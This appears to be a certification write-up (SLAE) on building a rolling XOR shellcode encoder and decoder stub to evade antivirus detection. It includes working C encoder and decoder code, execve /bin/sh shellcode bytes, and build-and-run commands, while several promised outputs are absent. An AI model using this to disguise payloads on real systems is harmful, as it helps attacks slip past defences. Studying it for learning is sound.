This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE-924
The task is to:
- Create a custom encoding scheme like the “Insertion Encoder”
- PoC with using execve-stack as the shellcode to encode with your schema and execute
Rolling XOR encoder
Because most of the well-known encoders are easily detected by AV, it is very useful to be able to write your own custom encoder.
Let's create a rolling XOR encoder.
As the original shellcode we will use the reverse_tcp shellcode from the previous assignments.
For the key we will use a random value from 1 to 255 (a key of 0 would itself put a null byte into the output). This key is placed as the first byte of the encoded_shellcode. Then the first byte of the original_shellcode is XORed with the first byte of the encoded_shellcode (that is, with the random key) and the result is written to the second byte of the encoded_shellcode. Then the second byte of the original_shellcode is XORed with the second byte of the encoded_shellcode and the result is written to the third byte of the encoded_shellcode, and so on. Each output byte therefore depends on the previous output byte, which is what makes the XOR "rolling", and the encoded shellcode ends up one byte longer than the original. Since a XOR yields zero whenever its two inputs are equal, the encoder has to check its output for null bytes and pick another key if it finds one.
As a result we get encoded shellcode:
Now we should write the decoder stub, which decodes the payload in place and executes it.
We will use the JMP-CALL-POP technique to get the address of the encoded shellcode. We save that pointer in the edi register and zero out ecx; ecx will then hold the length of the original shellcode as the loop counter.
In each iteration the byte at edi moves into al and the following byte into bl. The result of XORing them is kept in al and written back to the location edi points to, which is exactly the inverse of the encoding step (original[i] = encoded[i] XOR encoded[i+1]). Then edi is incremented and the loop repeats until ecx reaches zero. Because the encoded shellcode is one byte longer than the original, the last encoded byte is left over after the loop; we overwrite it with a NOP so it cannot execute as garbage, and then jump to the decoded shellcode.
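The encoder and the decoder loop described above, as an added C example that is not part of the original post. The shellcode bytes are a constructed sample (the classic 23-byte execve "/bin//sh" stack shellcode) standing in for the author's reverse_tcp payload, which this page does not reproduce; the function names are my own. The decoder is written to mirror the stub's register dance (al, bl, edi, ecx) so that the in-place update and the leftover trailing byte are visible, and the encoder adds the null-byte check the scheme needs: whenever an original byte equals the previous encoded byte the output is zero, so the encoder walks the key space until the output is null-free.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <time.h>

/* Constructed sample input: the classic 23-byte execve("/bin//sh") stack
 * shellcode. It stands in for the author's reverse_tcp shellcode, which the
 * post does not reproduce. It is only encoded and decoded here, never run. */
static const uint8_t sample_shellcode[] = {
    0x31, 0xc0, 0x50, 0x68, 0x2f, 0x2f, 0x73, 0x68, 0x68, 0x2f, 0x62, 0x69,
    0x6e, 0x89, 0xe3, 0x50, 0x53, 0x89, 0xe1, 0xb0, 0x0b, 0xcd, 0x80
};

/* Rolling XOR encode: out[0] = key, out[i+1] = in[i] ^ out[i].
 * out must have room for n + 1 bytes.
 * Returns 1 if the encoded buffer contains no null byte, 0 otherwise. */
int rolling_xor_encode(const uint8_t *in, size_t n, uint8_t key, uint8_t *out)
{
    out[0] = key;
    for (size_t i = 0; i < n; i++)
        out[i + 1] = in[i] ^ out[i];
    for (size_t i = 0; i < n + 1; i++)
        if (out[i] == 0)
            return 0;           /* in[i-1] == out[i-1] produced a null */
    return 1;
}

/* Try all 255 non-zero keys, starting from a caller-chosen (e.g. random)
 * value, and keep the first one whose output is null-free.
 * Returns the key used, or -1 if every key yields a null somewhere. */
int find_clean_key(const uint8_t *in, size_t n, unsigned start, uint8_t *out)
{
    for (unsigned k = 0; k < 256; k++) {
        uint8_t key = (uint8_t)((start + k) & 0xff);
        if (key == 0)
            continue;           /* the key byte itself would be a null */
        if (rolling_xor_encode(in, n, key, out))
            return key;
    }
    return -1;
}

/* In-place decode that mirrors the decoder stub's loop: with edi at buf,
 * al = [edi], bl = [edi+1], al ^= bl, [edi] = al, inc edi, loop while --ecx.
 * After n iterations buf[0..n-1] hold the original bytes; buf[n] is the
 * leftover last encoded byte, which the stub overwrites with a NOP. */
void rolling_xor_decode_inplace(uint8_t *buf, size_t n)
{
    uint8_t *edi = buf;
    for (size_t ecx = n; ecx > 0; ecx--, edi++) {
        uint8_t al = edi[0];
        uint8_t bl = edi[1];
        al ^= bl;
        edi[0] = al;            /* encoded[i] is read before it is replaced */
    }
    *edi = 0x90;                /* edi now points at the trailing byte */
}

/* Round-trip check: 1 if encode followed by decode reproduces the input
 * and the trailing byte became a NOP. */
int roundtrip_ok(const uint8_t *in, size_t n, uint8_t key)
{
    uint8_t buf[512];
    if (n + 1 > sizeof buf)
        return 0;
    rolling_xor_encode(in, n, key, buf);
    rolling_xor_decode_inplace(buf, n);
    return memcmp(buf, in, n) == 0 && buf[n] == 0x90;
}

int main(void)
{
    uint8_t enc[sizeof sample_shellcode + 1];
    srand((unsigned)time(NULL));
    int key = find_clean_key(sample_shellcode, sizeof sample_shellcode,
                             (unsigned)rand(), enc);
    if (key < 0) {
        fputs("no key avoids null bytes for this payload\n", stderr);
        return 1;
    }
    printf("key: 0x%02x\n", key);
    /* Print in the form the NASM decoder stub's db line expects. */
    printf("encoded (%zu bytes): ", sizeof enc);
    for (size_t i = 0; i < sizeof enc; i++)
        printf("0x%02x%s", enc[i], i + 1 < sizeof enc ? "," : "\n");
    printf("round-trip %s\n",
           roundtrip_ok(sample_shellcode, sizeof sample_shellcode,
                        (uint8_t)key) ? "OK" : "FAILED");
    return 0;
}
```

The key walk matters in practice: with this sample, key 0x31 equals the first original byte, so the second encoded byte is 0x00 and the key must be rejected; the search then settles on the next null-free key. If no key at all works for a payload, the scheme itself has to change (for example a different chaining rule), since a null in the encoded buffer would truncate the payload in any string-copy based delivery.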
Let’s compile it!
nasm -f elf32 -o shellcode.o shellcode.nasm
ld -o shellcode shellcode.o
objdump -d shellcode -M intel
Let’s extract the opcodes:
objdump -d ./shellcode|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
Here it is:
There are no null bytes, which is fine.
We will use
Let’s compile it and RUN!
gcc shellcode.c -z execstack
./a.out
(On a 64-bit host add -m32, since the shellcode is 32-bit.)
And it works: